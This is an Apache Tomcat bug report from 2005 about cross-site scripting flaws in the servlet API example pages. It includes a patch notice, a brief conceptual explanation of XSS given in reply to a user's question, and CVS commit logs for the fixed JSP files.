Bug 32953

Summary: SERVLETAPI: XSS Issues
Product: Tomcat 5 Reporter: Mark Thomas <markt>
Component: Webapps:ExamplesAssignee: Tomcat Developers Mailing List <dev>
Status: RESOLVED FIXED    
Severity: blocker Keywords: PatchAvailable
Priority: P1    
Version: Nightly Build   
Target Milestone: ---   
Hardware: All   
OS: All   
Attachments: Patch for XSS issues

Description Mark Thomas 2005-01-05 12:24:34 UTC
A number of XSS issues have been reported against the examples.

I will attach a patch for jakarta-servletapi-5 that fixes the reported issues
(and a few others fo a similar nature).
Comment 1 Mark Thomas 2005-01-05 12:25:19 UTC
Created attachment 13896 [details]
Patch for XSS issues
Comment 2 lala 2005-01-10 03:38:09 UTC
Hi... Are you saying when user successfully login to tomcat Web Application 
Manager, they are able to control the tomcat?

Please advice me.. You advice is greatly appreciated. Thanks!

(In reply to comment #0)
> A number of XSS issues have been reported against the examples.
> I will attach a patch for jakarta-servletapi-5 that fixes the reported issues
> (and a few others fo a similar nature).

Comment 3 Mark Thomas 2005-01-10 20:05:43 UTC
Yes, but that has nothing to do with the XSS issue.

The Manager application is for managing Tomcat. Therefore, if someone has access
to the manager application they are managing (or controlling if you prefer) Tomcat.

XSS issues provide an attacker that controls one (untrusted) web site with a
mechanism for executing code on a client as if it was from another (trusted) web
site. Try a google for XSS for more info.
Comment 4 Jean-Francois Arcand 2005-01-18 16:31:49 UTC
Applied the patch:

Checking in jsr152/examples/jsp2/el/functions.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/el/functions.jsp,v  <-- 
functions.jsp
new revision: 1.5; previous revision: 1.4
done
Checking in jsr152/examples/jsp2/el/implicit-objects.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/el/implicit-objects.jsp,v 
<--  implicit-objects.jsp
new revision: 1.4; previous revision: 1.3
done
More commits to come...
Checking in jsr152/examples/jsp2/jspx/textRotate.jspx;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/jspx/textRotate.jspx,v  <--
 textRotate.jspx
new revision: 1.4; previous revision: 1.3
done
More commits to come...
Checking in jsr152/examples/snp/snoop.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/snp/snoop.jsp,v  <--  snoop.jsp
new revision: 1.3; previous revision: 1.2
done